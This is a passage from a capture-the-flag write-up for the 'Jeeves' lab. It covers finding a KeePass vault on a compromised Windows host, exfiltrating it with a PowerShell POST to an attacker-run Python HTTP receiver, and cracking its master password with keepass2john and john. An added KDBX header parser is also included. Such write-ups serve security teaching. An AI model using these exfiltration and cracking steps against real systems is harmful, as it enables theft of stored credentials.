KeePass


After basic enumeration, checking the home directory of the kohsuke user

c:\Users\kohsuke\Documents> dir
 
 Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of c:\Users\kohsuke\Documents
 
11/03/2017  10:18 PM    <DIR>          .
11/03/2017  10:18 PM    <DIR>          ..
09/18/2017  12:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   2,330,460,160 bytes free

A KeePass database file is found at c:\Users\kohsuke\Documents\CEH.kdbx. I will transfer it to Kali for in-depth analysis.

Due to the network limitations from the NTLM configuration and the firewall profile, the file transfer will be made over HTTP to a custom Python HTTP server. The receiver below accepts POST requests and writes the raw request body to disk:

from http.server import BaseHTTPRequestHandler, HTTPServer

class MyRequestHandler(BaseHTTPRequestHandler):
    # The handler name is case-sensitive: it must be do_POST, not do_post
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        # Write the request body to disk unmodified, in binary mode
        with open('CEH.kdbx', 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()  # terminate the response so the client does not hang

httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()

c:\Users\kohsuke\Documents> cmd /c powershell -c "iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile C:\Users\kohsuke\Documents\CEH.kdbx"
 
┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ python3 post.py                                                                       
10.10.10.63 - - [01/Dec/2023 15:55:58] "POST / HTTP/1.1" 200 -

Transfer complete. The received file should be the same 2,846 bytes that dir reported on the target, which is a quick check that the upload was not truncated.

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ file CEH.kdbx                
CEH.kdbx: Keepass password database 2.x KDBX

The CEH.kdbx file is indeed a KeePass DB file, version 2.x

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ open CEH.kdbx

Opening the DB requires a valid password

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ keepass2john CEH.kdbx > CEH.kdbx.hash

Using keepass2john, I can turn the database file into a crackable hash string that john understands.
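keepass2john works entirely from the unencrypted outer header of the .kdbx file: the signature and version bytes, the cipher UUID, and the key-transformation round count, which is the "iteration count" john reports as Cost 1 before it tries a single password. The parser below is an added example written for this page, not code from the writeup or from the KeePass or john projects. It reads those header fields for both KDBX 3.x (2-byte field sizes, rounds stored directly) and KDBX 4.x (4-byte field sizes, KDF described by a VariantDictionary), so it also covers the Argon2 vaults that keepass2john handles differently. The field IDs and UUIDs are those of the KDBX specification; the function names are my own, and the sample header it builds is constructed test data, not CEH.kdbx.

```python
"""Inspect the plaintext outer header of a KeePass 2.x (.kdbx) file.

Added example for this writeup, not code from the original page or from
KeePass/john. Reads the same unencrypted fields keepass2john relies on
(format version, cipher, key-derivation cost) without the master password.
"""
import struct
import uuid

SIG1 = 0x9AA2D903        # first signature, common to all KeePass 2.x files
SIG2 = 0xB54BFB67        # second signature for release-format KDBX files

CIPHERS = {
    uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff"): "AES-256",
    uuid.UUID("d6038a2b-8b6f-4cb5-a524-339a31dbb59a"): "ChaCha20",
    uuid.UUID("ad68f29f-576f-4bb9-a36a-d47af965346c"): "Twofish",
}
KDFS = {
    uuid.UUID("c9d9f39a-628a-4460-bf74-0d08c18a4fea"): "AES-KDF",
    uuid.UUID("ef636ddf-8c29-444b-91f7-a9a403e30a0c"): "Argon2d",
    uuid.UUID("9e298b19-56db-4773-b23d-fc3ec6f0a1e6"): "Argon2id",
}

# Outer-header field IDs (KDBX 3 uses 2-byte field sizes, KDBX 4 uses 4-byte)
F_END, F_CIPHER, F_COMPRESSION, F_MASTER_SEED = 0, 2, 3, 4
F_TRANSFORM_SEED, F_TRANSFORM_ROUNDS, F_IV, F_KDF_PARAMS = 5, 6, 7, 11


def variant_dict(blob):
    """Decode the KDBX 4 VariantDictionary that carries KdfParameters."""
    out, pos = {}, 2                       # skip the 2-byte dictionary version
    while blob[pos] != 0:                  # type byte 0x00 terminates the list
        vtype = blob[pos]
        nlen = struct.unpack_from("<i", blob, pos + 1)[0]
        name = blob[pos + 5:pos + 5 + nlen].decode()
        pos += 5 + nlen
        vlen = struct.unpack_from("<i", blob, pos)[0]
        val = blob[pos + 4:pos + 4 + vlen]
        pos += 4 + vlen
        if vtype in (0x04, 0x05, 0x0C, 0x0D):      # UInt32, UInt64, Int32, Int64
            val = int.from_bytes(val, "little", signed=vtype in (0x0C, 0x0D))
        elif vtype == 0x08:                          # Bool
            val = bool(val[0])
        elif vtype == 0x18:                          # UTF-8 string
            val = val.decode()
        out[name] = val                              # 0x42 ByteArray stays bytes
    return out


def parse_kdbx_header(data):
    """Return version, cipher and KDF cost from a KDBX file's outer header."""
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", data, 0)
    if (sig1, sig2) != (SIG1, SIG2):
        raise ValueError("not a KeePass 2.x KDBX file")
    info, pos = {"version": f"{major}.{minor}"}, 12
    size_fmt, size_len = ("<I", 4) if major >= 4 else ("<H", 2)
    while True:
        fid = data[pos]
        size = struct.unpack_from(size_fmt, data, pos + 1)[0]
        field = data[pos + 1 + size_len:pos + 1 + size_len + size]
        pos += 1 + size_len + size
        if fid == F_END:
            return info
        if fid == F_CIPHER:
            info["cipher"] = CIPHERS.get(uuid.UUID(bytes=field), "unknown")
        elif fid == F_TRANSFORM_ROUNDS:            # KDBX 3: AES-KDF round count
            info["kdf"], info["kdf_cost"] = "AES-KDF", struct.unpack("<Q", field)[0]
        elif fid == F_KDF_PARAMS:                  # KDBX 4: KDF selected by UUID
            p = variant_dict(field)
            kdf = KDFS.get(uuid.UUID(bytes=p["$UUID"]), "unknown")
            info["kdf"] = kdf
            # AES-KDF stores rounds as "R"; Argon2 stores iterations "I", memory "M"
            info["kdf_cost"] = p["R"] if kdf == "AES-KDF" else p.get("I")
            if "M" in p:
                info["argon2_memory"] = p["M"]


def build_sample_kdbx3_header(rounds=6000):
    """Constructed KDBX 3.1 outer header (test data, not the CEH.kdbx vault)."""
    def field(fid, payload):
        return bytes([fid]) + struct.pack("<H", len(payload)) + payload
    hdr = struct.pack("<IIHH", SIG1, SIG2, 1, 3)                 # version 3.1
    hdr += field(F_CIPHER, uuid.UUID("31c1f2e6-bf71-4350-be58-05216afc5aff").bytes)
    hdr += field(F_COMPRESSION, struct.pack("<I", 1))           # gzip
    hdr += field(F_MASTER_SEED, bytes(32))                       # zeroed for the sample
    hdr += field(F_TRANSFORM_SEED, bytes(32))
    hdr += field(F_TRANSFORM_ROUNDS, struct.pack("<Q", rounds))
    hdr += field(F_IV, bytes(16))
    return hdr + field(F_END, b"\r\n\r\n")


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:
        print(parse_kdbx_header(f.read()))
```

Running it as `python3 kdbx_header.py CEH.kdbx` prints the version, cipher and KDF cost of a real vault. The cost is what decides how far a wordlist attack gets: a KDBX 3 vault with a few thousand AES-KDF rounds costs only that many AES block operations per guess, which is why john gets through about 2,600 candidates per second here, whereas a KDBX 4 vault using Argon2 with tens of megabytes of memory per guess is orders of magnitude slower to attack with the same hardware.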

┌──(kali㉿kali)-[~/archive/htb/labs/jeeves]
└─$ john ./CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:00:21 DONE (2023-12-01 17:09) 0.04723g/s 2597p/s 2597c/s 2597C/s narda..mommy14
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

john successfully cracked the password hash. The cracked master password is moonshine1.

Credentials


Opening the vault with the cracked password reveals its content. There are 8 entries in total, one of which looks very interesting.